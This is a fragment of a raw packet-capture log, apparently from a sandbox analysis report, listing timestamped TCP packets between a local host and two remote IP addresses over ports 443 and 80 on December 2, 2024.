                                                            Dec 2, 2024 09:18:17.446958065 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:17.446964025 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:17.449449062 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:17.449691057 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:17.449696064 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:17.452824116 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:17.452940941 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:17.452946901 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:17.455831051 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:17.455960035 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:17.455967903 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:17.458594084 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:17.458765984 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:17.458771944 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:17.461177111 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:17.461488962 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:17.461496115 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:17.464585066 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:17.464740038 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:17.464751005 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:17.492578030 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:17.492691040 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:17.492697954 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:17.537391901 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:17.605353117 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:17.605360985 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:17.605591059 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:17.605598927 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:17.627846003 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:17.627918959 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:17.627926111 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:17.630601883 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:17.630631924 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:17.630655050 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:17.630661964 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:17.630690098 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:17.633261919 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:17.633348942 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:17.633354902 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:17.636590958 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:17.636729002 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:17.636735916 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:17.639305115 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:17.639410973 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:17.639416933 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:17.642680883 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:17.642851114 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:17.642858982 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:17.645328045 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:17.645654917 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:17.645662069 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:17.648176908 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:17.648303032 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:17.648309946 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:17.651401043 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:17.651518106 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:17.651525974 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:17.653999090 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:17.654088020 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:17.654093981 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:17.656797886 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:17.656905890 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:17.656912088 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:17.660109043 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:17.660180092 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:17.660187006 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:17.663147926 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:17.663216114 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:17.663223028 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:17.665803909 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:17.665931940 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:17.665939093 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:17.693825006 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:17.693933010 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:17.693945885 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:17.740453005 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:17.806473970 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:17.806480885 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:17.806544065 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:17.806557894 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:17.829185009 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:17.829241991 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:17.829258919 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:17.832600117 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:17.832637072 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:17.832655907 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:17.832664013 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:17.832678080 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:17.834299088 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:17.834348917 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:17.834353924 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:17.834378958 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:17.834425926 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:17.837846994 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:32.479346037 CET4973980192.168.2.4172.245.123.12
                                                            Dec 2, 2024 09:18:32.599337101 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:32.599550009 CET4973980192.168.2.4172.245.123.12
                                                            Dec 2, 2024 09:18:32.599550962 CET4973980192.168.2.4172.245.123.12
                                                            Dec 2, 2024 09:18:32.719505072 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:33.752301931 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:33.752322912 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:33.752334118 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:33.752438068 CET4973980192.168.2.4172.245.123.12
                                                            Dec 2, 2024 09:18:33.752460003 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:33.752473116 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:33.752485037 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:33.752496004 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:33.752511024 CET4973980192.168.2.4172.245.123.12
                                                            Dec 2, 2024 09:18:33.752525091 CET4973980192.168.2.4172.245.123.12
                                                            Dec 2, 2024 09:18:33.752722979 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:33.752758980 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:33.752767086 CET4973980192.168.2.4172.245.123.12
                                                            Dec 2, 2024 09:18:33.752772093 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:33.752804995 CET4973980192.168.2.4172.245.123.12
                                                            Dec 2, 2024 09:18:33.872441053 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:33.872538090 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:33.872685909 CET4973980192.168.2.4172.245.123.12
                                                            Dec 2, 2024 09:18:33.876595974 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:33.928265095 CET4973980192.168.2.4172.245.123.12
                                                            Dec 2, 2024 09:18:33.953433990 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:33.953490019 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:33.953563929 CET4973980192.168.2.4172.245.123.12
                                                            Dec 2, 2024 09:18:33.955888033 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:33.955991030 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:33.956134081 CET4973980192.168.2.4172.245.123.12
                                                            Dec 2, 2024 09:18:33.964308023 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:33.964405060 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:33.964462996 CET4973980192.168.2.4172.245.123.12
                                                            Dec 2, 2024 09:18:33.970812082 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:33.970910072 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:33.970953941 CET4973980192.168.2.4172.245.123.12
                                                            Dec 2, 2024 09:18:33.979228973 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:33.979357004 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:33.979406118 CET4973980192.168.2.4172.245.123.12
                                                            Dec 2, 2024 09:18:33.987689018 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:33.987765074 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:33.987811089 CET4973980192.168.2.4172.245.123.12
                                                            Dec 2, 2024 09:18:33.996069908 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:33.996160984 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:33.996218920 CET4973980192.168.2.4172.245.123.12
                                                            Dec 2, 2024 09:18:34.004425049 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:34.004535913 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:34.004591942 CET4973980192.168.2.4172.245.123.12
                                                            Dec 2, 2024 09:18:34.013149023 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:34.013322115 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:34.013379097 CET4973980192.168.2.4172.245.123.12
                                                            Dec 2, 2024 09:18:34.021230936 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:34.021334887 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:34.021384954 CET4973980192.168.2.4172.245.123.12
                                                            Dec 2, 2024 09:18:34.048230886 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:34.048249006 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:34.048415899 CET4973980192.168.2.4172.245.123.12
                                                            Dec 2, 2024 09:18:34.073501110 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:34.073606968 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:34.073656082 CET4973980192.168.2.4172.245.123.12
                                                            Dec 2, 2024 09:18:34.077724934 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:34.131294012 CET4973980192.168.2.4172.245.123.12
                                                            Dec 2, 2024 09:18:34.154874086 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:34.155057907 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:34.155117989 CET4973980192.168.2.4172.245.123.12
                                                            Dec 2, 2024 09:18:34.157350063 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:34.157459974 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:34.157522917 CET4973980192.168.2.4172.245.123.12
                                                            Dec 2, 2024 09:18:34.162410021 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:34.162545919 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:34.162595034 CET4973980192.168.2.4172.245.123.12
                                                            Dec 2, 2024 09:18:34.167252064 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:34.167361021 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:34.167418003 CET4973980192.168.2.4172.245.123.12
                                                            Dec 2, 2024 09:18:34.172234058 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:34.172352076 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:34.172405005 CET4973980192.168.2.4172.245.123.12
                                                            Dec 2, 2024 09:18:34.177194118 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:34.177371979 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:34.177421093 CET4973980192.168.2.4172.245.123.12
                                                            Dec 2, 2024 09:18:34.182135105 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:34.182249069 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:34.182297945 CET4973980192.168.2.4172.245.123.12
                                                            Dec 2, 2024 09:18:34.187107086 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:34.187252045 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:34.187300920 CET4973980192.168.2.4172.245.123.12
                                                            Dec 2, 2024 09:18:34.192064047 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:34.192187071 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:34.192234993 CET4973980192.168.2.4172.245.123.12
                                                            Dec 2, 2024 09:18:34.197068930 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:34.197170973 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:34.197221041 CET4973980192.168.2.4172.245.123.12
                                                            Dec 2, 2024 09:18:34.201999903 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:34.202137947 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:34.202184916 CET4973980192.168.2.4172.245.123.12
                                                            Dec 2, 2024 09:18:34.207007885 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:34.207106113 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:34.207165003 CET4973980192.168.2.4172.245.123.12
                                                            Dec 2, 2024 09:18:34.210766077 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:34.210896015 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:34.210943937 CET4973980192.168.2.4172.245.123.12
                                                            Dec 2, 2024 09:18:34.214585066 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:34.214687109 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:34.214725971 CET4973980192.168.2.4172.245.123.12
                                                            Dec 2, 2024 09:18:34.218415976 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:34.218538046 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:34.218585968 CET4973980192.168.2.4172.245.123.12
                                                            Dec 2, 2024 09:18:34.222305059 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:34.222426891 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:34.222477913 CET4973980192.168.2.4172.245.123.12
                                                            Dec 2, 2024 09:18:34.226073027 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:34.226197004 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:34.226243973 CET4973980192.168.2.4172.245.123.12
                                                            Dec 2, 2024 09:18:34.229896069 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:34.230005980 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:34.230084896 CET4973980192.168.2.4172.245.123.12
                                                            Dec 2, 2024 09:18:34.233726025 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:34.233839035 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:34.233887911 CET4973980192.168.2.4172.245.123.12
                                                            Dec 2, 2024 09:18:34.237534046 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:34.237700939 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:34.237746954 CET4973980192.168.2.4172.245.123.12
                                                            Dec 2, 2024 09:18:34.241416931 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:34.241548061 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:34.241596937 CET4973980192.168.2.4172.245.123.12
                                                            Dec 2, 2024 09:18:34.245197058 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:34.245304108 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:34.245352030 CET4973980192.168.2.4172.245.123.12
                                                            Dec 2, 2024 09:18:34.251290083 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:34.251435041 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:34.251477003 CET4973980192.168.2.4172.245.123.12
                                                            Dec 2, 2024 09:18:34.275126934 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:34.318780899 CET4973980192.168.2.4172.245.123.12
                                                            Dec 2, 2024 09:18:34.356607914 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:34.356642008 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:34.356708050 CET4973980192.168.2.4172.245.123.12
                                                            Dec 2, 2024 09:18:34.357419014 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:34.357464075 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:34.357508898 CET4973980192.168.2.4172.245.123.12
                                                            Dec 2, 2024 09:18:34.360333920 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:34.360471964 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:34.360521078 CET4973980192.168.2.4172.245.123.12
                                                            Dec 2, 2024 09:18:34.363171101 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:34.363260984 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:34.363301039 CET4973980192.168.2.4172.245.123.12
                                                            Dec 2, 2024 09:18:34.366043091 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:34.366156101 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:34.366208076 CET4973980192.168.2.4172.245.123.12
                                                            Dec 2, 2024 09:18:34.368871927 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:34.369021893 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:34.369079113 CET4973980192.168.2.4172.245.123.12
                                                            Dec 2, 2024 09:18:34.371628046 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:34.371735096 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:34.371782064 CET4973980192.168.2.4172.245.123.12
                                                            Dec 2, 2024 09:18:34.374228954 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:34.374345064 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:34.374401093 CET4973980192.168.2.4172.245.123.12
                                                            Dec 2, 2024 09:18:34.376945019 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:34.377032042 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:34.377079010 CET4973980192.168.2.4172.245.123.12
                                                            Dec 2, 2024 09:18:34.379553080 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:34.379700899 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:34.379762888 CET4973980192.168.2.4172.245.123.12
                                                            Dec 2, 2024 09:18:34.382211924 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:34.382364035 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:34.382426977 CET4973980192.168.2.4172.245.123.12
                                                            Dec 2, 2024 09:18:34.384871006 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:34.384979963 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:34.385030985 CET4973980192.168.2.4172.245.123.12
                                                            Dec 2, 2024 09:18:34.387485981 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:34.387639046 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:34.387689114 CET4973980192.168.2.4172.245.123.12
                                                            Dec 2, 2024 09:18:34.390136003 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:34.390331984 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:34.390378952 CET4973980192.168.2.4172.245.123.12
                                                            Dec 2, 2024 09:18:34.392807961 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:34.392903090 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:34.392951965 CET4973980192.168.2.4172.245.123.12
                                                            Dec 2, 2024 09:18:34.395416021 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:34.395509958 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:34.395560980 CET4973980192.168.2.4172.245.123.12
                                                            Dec 2, 2024 09:18:34.398085117 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:34.398178101 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:34.398221016 CET4973980192.168.2.4172.245.123.12
                                                            Dec 2, 2024 09:18:34.400743008 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:34.400810957 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:34.400863886 CET4973980192.168.2.4172.245.123.12
                                                            Dec 2, 2024 09:18:34.403342962 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:34.403444052 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:34.403501034 CET4973980192.168.2.4172.245.123.12
                                                            Dec 2, 2024 09:18:34.405941010 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:34.406081915 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:34.406136990 CET4973980192.168.2.4172.245.123.12
                                                            Dec 2, 2024 09:18:34.408678055 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:34.408799887 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:34.408854008 CET4973980192.168.2.4172.245.123.12
                                                            Dec 2, 2024 09:18:34.411226988 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:34.411355019 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:34.411421061 CET4973980192.168.2.4172.245.123.12
                                                            Dec 2, 2024 09:18:34.413886070 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:34.413997889 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:34.414048910 CET4973980192.168.2.4172.245.123.12
                                                            Dec 2, 2024 09:18:34.416584015 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:34.416764021 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:34.416817904 CET4973980192.168.2.4172.245.123.12
                                                            Dec 2, 2024 09:18:34.419226885 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:34.419302940 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:34.419354916 CET4973980192.168.2.4172.245.123.12
                                                            Dec 2, 2024 09:18:34.421871901 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:34.421935081 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:34.421991110 CET4973980192.168.2.4172.245.123.12
                                                            Dec 2, 2024 09:18:34.424454927 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:34.424576998 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:34.424627066 CET4973980192.168.2.4172.245.123.12
                                                            Dec 2, 2024 09:18:34.427097082 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:34.427194118 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:34.427272081 CET4973980192.168.2.4172.245.123.12
                                                            Dec 2, 2024 09:18:34.429728985 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:34.429851055 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:34.429929972 CET4973980192.168.2.4172.245.123.12
                                                            Dec 2, 2024 09:18:34.432420969 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:34.432495117 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:34.432622910 CET4973980192.168.2.4172.245.123.12
                                                            Dec 2, 2024 09:18:34.435029984 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:34.435146093 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:34.435224056 CET4973980192.168.2.4172.245.123.12
                                                            Dec 2, 2024 09:18:34.437678099 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:34.437793970 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:34.437865019 CET4973980192.168.2.4172.245.123.12
                                                            Dec 2, 2024 09:18:34.440345049 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:34.440463066 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:34.440540075 CET4973980192.168.2.4172.245.123.12
                                                            Dec 2, 2024 09:18:34.442986965 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:34.443054914 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:34.443137884 CET4973980192.168.2.4172.245.123.12
                                                            Dec 2, 2024 09:18:34.445591927 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:34.445698977 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:34.445774078 CET4973980192.168.2.4172.245.123.12
                                                            Dec 2, 2024 09:18:34.448139906 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:34.448276043 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:34.448359966 CET4973980192.168.2.4172.245.123.12
                                                            Dec 2, 2024 09:18:34.450676918 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:34.450788021 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:34.450861931 CET4973980192.168.2.4172.245.123.12
                                                            Dec 2, 2024 09:18:34.453231096 CET8049739172.245.123.12192.168.2.4
